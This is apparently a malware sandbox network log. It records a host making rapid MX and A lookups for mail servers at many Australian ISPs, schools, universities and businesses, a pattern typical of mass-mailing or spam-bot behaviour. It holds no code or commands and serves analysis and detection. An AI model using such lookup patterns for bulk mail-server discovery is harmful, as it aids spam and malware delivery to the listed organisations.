                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.739190102 CET192.168.2.38.8.8.80xb785Standard query (0)ehtravel.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.820350885 CET192.168.2.38.8.8.80xe816Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.842921972 CET192.168.2.38.8.8.80x39caStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.900341988 CET192.168.2.38.8.8.80x4905Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.940021992 CET192.168.2.38.8.8.80xc9beStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:39.979186058 CET192.168.2.38.8.8.80xba4dStandard query (0)wangaratta-high.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.074464083 CET192.168.2.38.8.8.80xdf1dStandard query (0)bsharpaccounts.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.114495039 CET192.168.2.38.8.8.80xce76Standard query (0)d501078.b.ess.au.barracudanetworks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.187865019 CET192.168.2.38.8.8.80xae21Standard query (0)hotkey.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.250416040 CET192.168.2.38.8.8.80xfd1cStandard query (0)lizzy.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.361542940 CET192.168.2.38.8.8.80x80fStandard query (0)mst.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.409554005 CET192.168.2.38.8.8.80x9d75Standard query (0)mx1-us1.ppe-hosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.415251970 CET192.168.2.38.8.8.80x23adStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.436897039 CET192.168.2.38.8.8.80xff1aStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.509954929 CET192.168.2.38.8.8.80xb3aaStandard query (0)mx.syd.iprimus.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.511214972 CET192.168.2.38.8.8.80x3baStandard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.534298897 CET192.168.2.38.8.8.80xb068Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.605878115 CET192.168.2.38.8.8.80xd25aStandard query (0)mx.ozonline.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.606547117 CET192.168.2.38.8.8.80xcc77Standard query (0)suncorp.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.626472950 CET192.168.2.38.8.8.80xaf54Standard query (0)cluster9a.us.messagelabs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.721446991 CET192.168.2.38.8.8.80x2ce1Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.745531082 CET192.168.2.38.8.8.80xa8cfStandard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.811192989 CET192.168.2.38.8.8.80x691bStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.834475040 CET192.168.2.38.8.8.80x562eStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.897836924 CET192.168.2.38.8.8.80x471aStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.920113087 CET192.168.2.38.8.8.80xffedStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.972537994 CET192.168.2.38.8.8.80xead6Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:40.991974115 CET192.168.2.38.8.8.80x40cdStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.073462963 CET192.168.2.38.8.8.80xd50dStandard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.076448917 CET192.168.2.38.8.8.80xdf1dStandard query (0)bsharpaccounts.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.094031096 CET192.168.2.38.8.8.80xaea3Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.146398067 CET192.168.2.38.8.8.80x27c9Standard query (0)coffsracingclub.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.227833033 CET192.168.2.38.8.8.80x2af4Standard query (0)qldnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.287844896 CET192.168.2.38.8.8.80x1bd9Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.308878899 CET192.168.2.38.8.8.80xc441Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.395967007 CET192.168.2.38.8.8.80x6332Standard query (0)pacbrands.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.448244095 CET192.168.2.38.8.8.80x30beStandard query (0)pacbrands-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.456646919 CET192.168.2.38.8.8.80xb68bStandard query (0)ALT1.ASPMX.L.GOOGLE.COMA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.458858013 CET192.168.2.38.8.8.80xd913Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.478295088 CET192.168.2.38.8.8.80x50c9Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.519084930 CET192.168.2.38.8.8.80x5192Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.537350893 CET192.168.2.38.8.8.80xf6b8Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.570096970 CET192.168.2.38.8.8.80xf4ffStandard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.597377062 CET192.168.2.38.8.8.80xfcaeStandard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.618696928 CET192.168.2.38.8.8.80x374Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.674940109 CET192.168.2.38.8.8.80xea0fStandard query (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.754340887 CET192.168.2.38.8.8.80x6cceStandard query (0)eq-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.833204031 CET192.168.2.38.8.8.80x520dStandard query (0)penrhos.wa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.912103891 CET192.168.2.38.8.8.80xf180Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.933449984 CET192.168.2.38.8.8.80xb2d2Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:41.946552038 CET192.168.2.38.8.8.80x6816Standard query (0)mx1.hc2195-28.iphmx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.004811049 CET192.168.2.38.8.8.80x20cStandard query (0)ozemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.025805950 CET192.168.2.38.8.8.80x9a08Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.084228039 CET192.168.2.38.8.8.80xc339Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.105489969 CET192.168.2.38.8.8.80xb488Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.162425995 CET192.168.2.38.8.8.80xdd82Standard query (0)imcc.wa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.183890104 CET192.168.2.38.8.8.80xff41Standard query (0)imcc-wa-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.257674932 CET192.168.2.38.8.8.80xd3a9Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.278561115 CET192.168.2.38.8.8.80xa80fStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.317406893 CET192.168.2.38.8.8.80xb204Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.337565899 CET192.168.2.38.8.8.80xfea3Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.410026073 CET192.168.2.38.8.8.80x379cStandard query (0)firstwave.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.434624910 CET192.168.2.38.8.8.80x9f3fStandard query (0)firstwave-mx2.firstwave.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.487404108 CET192.168.2.38.8.8.80x9f06Standard query (0)spencedoors.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.536935091 CET192.168.2.38.8.8.80xb558Standard query (0)cluster8a.us.messagelabs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.582943916 CET192.168.2.38.8.8.80x4cc7Standard query (0)cdu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.660686970 CET192.168.2.38.8.8.80xfb8eStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.681874990 CET192.168.2.38.8.8.80x9e1bStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.770565033 CET192.168.2.38.8.8.80xb34eStandard query (0)alphalink.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.833585024 CET192.168.2.38.8.8.80x829dStandard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.855849028 CET192.168.2.38.8.8.80x3fdbStandard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.908972025 CET192.168.2.38.8.8.80x111Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:42.928463936 CET192.168.2.38.8.8.80xfba4Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.005660057 CET192.168.2.38.8.8.80x96eaStandard query (0)echowebhosting.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.035358906 CET192.168.2.38.8.8.80x864cStandard query (0)cdu-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.114227057 CET192.168.2.38.8.8.80x63cfStandard query (0)bidbuild.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.176561117 CET192.168.2.38.8.8.80xd9a0Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.195686102 CET192.168.2.38.8.8.80xce22Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.216469049 CET192.168.2.38.8.8.80x9dfStandard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.270697117 CET192.168.2.38.8.8.80xcd54Standard query (0)aapt.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.366566896 CET192.168.2.38.8.8.80xe576Standard query (0)healforlife.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.371474981 CET192.168.2.38.8.8.80xada6Standard query (0)mail.bidbuild.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.387792110 CET192.168.2.38.8.8.80x7964Standard query (0)healforlife-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.472944021 CET192.168.2.38.8.8.80xf8a7Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.491288900 CET192.168.2.38.8.8.80x3aadStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.551126003 CET192.168.2.38.8.8.80x5787Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.571240902 CET192.168.2.38.8.8.80x21c0Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.612699032 CET192.168.2.38.8.8.80x7d4aStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.615004063 CET192.168.2.38.8.8.80x6633Standard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.632831097 CET192.168.2.38.8.8.80x61b3Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.691668987 CET192.168.2.38.8.8.80xa404Standard query (0)usyd.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.788100958 CET192.168.2.38.8.8.80xd937Standard query (0)fahan.tas.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.894198895 CET192.168.2.38.8.8.80xa41dStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.919214010 CET192.168.2.38.8.8.80xdcafStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.972429991 CET192.168.2.38.8.8.80xf164Standard query (0)actraders.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.993719101 CET192.168.2.38.8.8.80x2835Standard query (0)au-smtp-inbound-2.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:43.995327950 CET192.168.2.38.8.8.80xc508Standard query (0)mail.actraders.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.016664028 CET192.168.2.38.8.8.80x1774Standard query (0)fahan-tas-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.066143036 CET192.168.2.38.8.8.80xdab5Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.084975004 CET192.168.2.38.8.8.80x682cStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.176502943 CET192.168.2.38.8.8.80xf8a8Standard query (0)austarnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.255875111 CET192.168.2.38.8.8.80x2f69Standard query (0)riverside.qld.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.305686951 CET192.168.2.38.8.8.80x36cbStandard query (0)riverside-qld-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.334424019 CET192.168.2.38.8.8.80x79f7Standard query (0)mail.austarnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.347151041 CET192.168.2.38.8.8.80x5461Standard query (0)people.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.411855936 CET192.168.2.38.8.8.80x6f17Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.432523012 CET192.168.2.38.8.8.80x3454Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.473608017 CET192.168.2.38.8.8.80x2d5aStandard query (0)austarnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.499201059 CET192.168.2.38.8.8.80x49d5Standard query (0)mail.austarnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.578073978 CET192.168.2.38.8.8.80x93bcStandard query (0)uow.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.673446894 CET192.168.2.38.8.8.80xf188Standard query (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.692562103 CET192.168.2.38.8.8.80x1136Standard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.736974955 CET192.168.2.38.8.8.80xceb8Standard query (0)students.plc.wa.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.759192944 CET192.168.2.38.8.8.80xc41cStandard query (0)ipt-mailgate-01.m2core.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.788947105 CET192.168.2.38.8.8.80xaa1cStandard query (0)mx1.hc210-97.ap.iphmx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.832360983 CET192.168.2.38.8.8.80xdeabStandard query (0)aapt.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.921622992 CET192.168.2.38.8.8.80x17b3Standard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.926798105 CET192.168.2.38.8.8.80x2c55Standard query (0)ozemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:44.950527906 CET192.168.2.38.8.8.80x94d8Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.020000935 CET192.168.2.38.8.8.80x883fStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.038861036 CET192.168.2.38.8.8.80x209fStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.098618031 CET192.168.2.38.8.8.80x784bStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.116920948 CET192.168.2.38.8.8.80x81a2Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.180557013 CET192.168.2.38.8.8.80x3f1dStandard query (0)asav.tpgtelecom.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.207200050 CET192.168.2.38.8.8.80x304dStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.228571892 CET192.168.2.38.8.8.80xe2e1Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.300308943 CET192.168.2.38.8.8.80x213fStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.320714951 CET192.168.2.38.8.8.80xba29Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.362852097 CET192.168.2.38.8.8.80x681dStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.383800030 CET192.168.2.38.8.8.80xcf0Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.441648006 CET192.168.2.38.8.8.80x9d56Standard query (0)healesvillemusicfestival.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.544092894 CET192.168.2.38.8.8.80x626bStandard query (0)streamingmedia.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.559020996 CET192.168.2.38.8.8.80x7064Standard query (0)alt3.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.570139885 CET192.168.2.38.8.8.80x2f02Standard query (0)filter.au.syrahost.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.630209923 CET192.168.2.38.8.8.80xcc8aStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.651062012 CET192.168.2.38.8.8.80x62a5Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.700697899 CET192.168.2.38.8.8.80x67dfStandard query (0)optunet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.768732071 CET192.168.2.38.8.8.80x9de0Standard query (0)alt2.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.770416021 CET192.168.2.38.8.8.80xec47Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.790915966 CET192.168.2.38.8.8.80x3b1Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.847757101 CET192.168.2.38.8.8.80x83beStandard query (0)kingswayaustralia.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:45.943209887 CET192.168.2.38.8.8.80x45b1Standard query (0)pit.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.005348921 CET192.168.2.38.8.8.80x922fStandard query (0)dalsegnostudios.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.082707882 CET192.168.2.38.8.8.80xbb02Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.104857922 CET192.168.2.38.8.8.80x74a4Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.178210020 CET192.168.2.38.8.8.80x6f9fStandard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.199373960 CET192.168.2.38.8.8.80xed6aStandard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.258405924 CET192.168.2.38.8.8.80x2dd7Standard query (0)mx.netregistry.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.269208908 CET192.168.2.38.8.8.80x5c12Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:46.288093090 CET192.168.2.38.8.8.80x4963Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                Dec 12, 2022 18:53:30.984673023 CET8.8.8.8192.168.2.30x1d5eNo error (0)windowsupdatebg.s.llnwi.net95.140.236.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:53:30.984673023 CET8.8.8.8192.168.2.30x1d5eNo error (0)windowsupdatebg.s.llnwi.net95.140.236.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:12.221973896 CET8.8.8.8192.168.2.30xa722No error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:12.221973896 CET8.8.8.8192.168.2.30xa722No error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:12.221973896 CET8.8.8.8192.168.2.30xa722No error (0)yahoo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:12.350239038 CET8.8.8.8192.168.2.30x9a79No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:12.350239038 CET8.8.8.8192.168.2.30x9a79No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:12.350239038 CET8.8.8.8192.168.2.30x9a79No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:12.350239038 CET8.8.8.8192.168.2.30x9a79No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:12.350239038 CET8.8.8.8192.168.2.30x9a79No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:12.350239038 CET8.8.8.8192.168.2.30x9a79No error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:12.350239038 CET8.8.8.8192.168.2.30x9a79No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:12.350239038 CET8.8.8.8192.168.2.30x9a79No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
